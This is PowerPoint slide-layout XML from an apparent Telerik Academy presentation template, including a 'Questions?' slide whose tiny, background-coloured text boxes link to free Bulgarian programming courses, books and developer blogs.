      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20041079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fld id="{C0009A08-9DAB-4319-B3C4-E1F7BC637D83}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210161211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2"/>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fld id="{C0009A08-9DAB-4319-B3C4-E1F7BC637D83}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1191944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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203986153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Questions Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>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p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3394421"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форум програмиране, форум уеб дизайн</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>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p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1350512" y="1528531"/>
              <a:ext cx="2008657" cy="1149887"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="bg-BG" sz="200" kern="1200" noProof="1" smtClean="0">
                  <a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>курсове и уроци по програмиране, уеб дизайн – безплатно</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" kern="1200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="TextBox 32">
              <a:hlinkClick r:id="rId4" tooltip="Програмиране за деца - безплатно в Телерик кидс академия"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1538277" y="2175144"/>
              <a:ext cx="1816698"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програмиране за деца – безплатни курсове и уроци</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" kern="1200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="TextBox 33">
              <a:hlinkClick r:id="rId5" tooltip="Безплатен SEO курс - оптимизация за търсачки, уроци по SEO"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1660733" y="2421354"/>
              <a:ext cx="1697684" cy="1210412"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="en-US"/>
              </a:defPPr>
              <a:lvl1pPr lvl="0">
                <a:defRPr sz="1200"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0" algn="l"/>
              <a:r>
                <a:rPr lang="bg-BG" sz="200" noProof="1" smtClean="0">
                  <a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                </a:rPr>
                <a:t>безплатен SEO курс - оптимизация за търсачки</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>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p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1448484" y="2878556"/>
              <a:ext cx="190883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уроци по уеб дизайн, HTML, CSS, JavaScript, Photoshop</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 35">
              <a:hlinkClick r:id="rId7" tooltip="Училищна софтуерна академия - безплатни уроци по програмиране и уеб дизайн"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1636239" y="1946534"/>
              <a:ext cx="174759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уроци по програмиране и уеб дизайн за ученици</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" kern="1200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36">
              <a:hlinkClick r:id="rId8" tooltip="Безплатен курс &quot;Програмиране с ASP.NET MVC&quot; - уеб технологии, бази данни, C#, .NET, ASP.NET MVC"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3402822"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MVC курс – HTML, SQL, C#, .NET, ASP.NET MVC</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="TextBox 37">
              <a:hlinkClick r:id="rId9" tooltip="Безплатен курс &quot;Разработка на софтуер в Cloud среда&quot; - AppEngine, AWS, Azure"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1440310" y="3574997"/>
              <a:ext cx="188196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"Разработка на софтуер в cloud среда"</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" kern="1200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="TextBox 38">
              <a:hlinkClick r:id="rId10" tooltip="BG Coder - онлайн състезателна система - тренировки за състезания по програмиране - online judge"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3389110" y="1523999"/>
              <a:ext cx="187428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BG Coder - онлайн състезателна система - online judge</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="TextBox 39">
              <a:hlinkClick r:id="rId11" tooltip="Светлин Наков - курсове и уроци по програмиране, уеб дизайн, книги, обучения - безплатно"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>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курсове и уроци по програмиране, книги – безплатно от Наков</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="TextBox 40">
              <a:hlinkClick r:id="rId12" tooltip="Безплатен курс &quot;Качествен програмен код&quot;"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1766855" y="3335748"/>
              <a:ext cx="159402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"Качествен програмен код"</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" kern="1200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRP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алго академия – състезателно програмиране, състезания</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="TextBox 42">
              <a:hlinkClick r:id="rId14" tooltip="Безплатен ASP.NET курс - уеб програмиране, бази данни, C#, .NET, ASP.NET"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>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курс - уеб програмиране, бази данни, C#, .NET, ASP.NET</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="TextBox 43">
              <a:hlinkClick r:id="rId15" tooltip="Софтуерна академия на Телерик - безплатни курсове и уроци по програмиране"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>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smtClean="0">
                  <a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                </a:rPr>
                <a:t>курсове и уроци по </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="bg-BG" sz="200" kern="1200" noProof="1" smtClean="0">
                  <a:ln w="0">
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>програмиране – Телерик академия</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" kern="1200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="TextBox 44">
              <a:hlinkClick r:id="rId16" tooltip="Безплатен курс &quot;Разработка на мобилни приложения&quot; - iPhone, Android, Windows Phone, PhoneGap, HTML5, jQuery, AJAX"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>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 мобилни приложения с iPhone, Android, WP7, PhoneGap</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>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p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1440317" y="3117785"/>
              <a:ext cx="1901159"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free C# book, безплатна книга C#, книга Java, книга C#</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" kern="1200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46">
              <a:hlinkClick r:id="rId18" tooltip="Дончо Минков - сайт за програмиране"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>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Дончо Минков - сайт за програмиране</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="TextBox 47">
              <a:hlinkClick r:id="rId19" tooltip="Николай Костов - блог за програмиране"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3401423" y="3217864"/>
              <a:ext cx="151340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Николай Костов - блог за програмиране</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" kern="1200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Corbel" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="TextBox 48">
              <a:hlinkClick r:id="rId20" tooltip="безплатен C# курс в софтуерната академия на Наков"/>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3398080"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C# курс, програмиране, безплатно</a:t>
              </a:r>
              <a:endParaRPr lang="bg-BG" sz="200" noProof="1">
                <a:ln w="0">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:hlinkClick r:id="rId4" tooltip="Програмиране за деца - безплатно в Телерик кидс академия"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9535351" flipH="1">
            <a:off x="923387"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12" name="TextBox 11">
            <a:hlinkClick r:id="rId5" tooltip="Безплатен SEO курс - оптимизация за търсачки, уроци по SEO"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16938170" flipH="1">
            <a:off x="4905823" y="1031967"/>
            <a:ext cx="859648" cy="1862048"/>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p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19836951" flipH="1">
            <a:off x="7379011" y="1495156"/>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4" name="TextBox 13">
            <a:hlinkClick r:id="rId7" tooltip="Училищна софтуерна академия - безплатни уроци по програмиране и уеб дизайн"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2233443" flipH="1">
            <a:off x="2139219" y="940067"/>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5" name="TextBox 14">
            <a:hlinkClick r:id="rId8" tooltip="Безплатен курс &quot;Програмиране с ASP.NET MVC&quot; - уеб технологии, бази данни, C#, .NET, ASP.NET MVC"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8530737" flipH="1">
            <a:off x="4757101"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6" name="TextBox 15">
            <a:hlinkClick r:id="rId9" tooltip="Безплатен курс &quot;Разработка на софтуер в Cloud среда&quot; - AppEngine, AWS, Azure"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12627025" flipH="1">
            <a:off x="2910498" y="4405709"/>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0" tooltip="BG Coder - онлайн състезателна система - тренировки за състезания по програмиране - online judge"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1186146" flipH="1">
            <a:off x="6185958"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8" name="TextBox 17">
            <a:hlinkClick r:id="rId11" tooltip="Светлин Наков - курсове и уроци по програмиране, уеб дизайн, книги, обучения - безплатно"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19460650" flipH="1">
            <a:off x="3150207" y="1979503"/>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9" name="TextBox 18">
            <a:hlinkClick r:id="rId12" tooltip="Безплатен курс &quot;Качествен програмен код&quot;"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18277140" flipH="1">
            <a:off x="405235" y="3272338"/>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p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18695734" flipH="1">
            <a:off x="3127408" y="5396301"/>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TextBox 20">
            <a:hlinkClick r:id="rId14" tooltip="Безплатен ASP.NET курс - уеб програмиране, бази данни, C#, .NET, ASP.NET"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>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22" name="TextBox 21">
            <a:hlinkClick r:id="rId15" tooltip="Софтуерна академия на Телерик - безплатни курсове и уроци по програмиране"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>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3" name="TextBox 22">
            <a:hlinkClick r:id="rId16" tooltip="Безплатен курс &quot;Разработка на мобилни приложения&quot; - iPhone, Android, Windows Phone, PhoneGap, HTML5, jQuery, AJAX"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20840689" flipH="1">
            <a:off x="8186733" y="5517703"/>
            <a:ext cx="357408" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="36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p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="15426793" flipH="1">
            <a:off x="1145826" y="4072255"/>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5" name="TextBox 24">
            <a:hlinkClick r:id="rId18" tooltip="Дончо Минков - сайт за програмиране"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>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6" name="TextBox 25">
            <a:hlinkClick r:id="rId19" tooltip="Николай Костов - блог за програмиране"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>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p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2086872" flipH="1">
            <a:off x="8330354" y="1359229"/>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8" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>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smtClean="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2"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84702772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Questions Slide">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1828800" y="152400"/>
            <a:ext cx="7086600" cy="9144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10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2438402"/>
            <a:ext cx="6400800" cy="2097345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="319088" marR="0" lvl="0" indent="-319088" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent5">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E8FFC8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327930112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4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57200" y="5224046"/>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757446"/>
            <a:ext cx="2090957" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="18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800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0EFE58"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Telerik Corporation</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062246"/>
            <a:ext cx="1707903"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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.telerik.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="5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846643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ource Code Exampl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828800" y="76200"/>
            <a:ext cx="7086600" cy="9144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4" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="10668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0" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="81534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Source code box</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8" name="Slide Number Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6553200"/>
            <a:ext cx="457200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{58452FF4-89E3-4D1B-9927-2DBDC00E58D7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302501375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1" y="0"/>
            <a:ext cx="91439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0" y="63502"/>
            <a:ext cx="9144000" cy="590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0" y="247652"/>
            <a:ext cx="9144000" cy="483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3">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId14">
                    <a14:imgEffect>
                      <a14:brightnessContrast bright="20000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
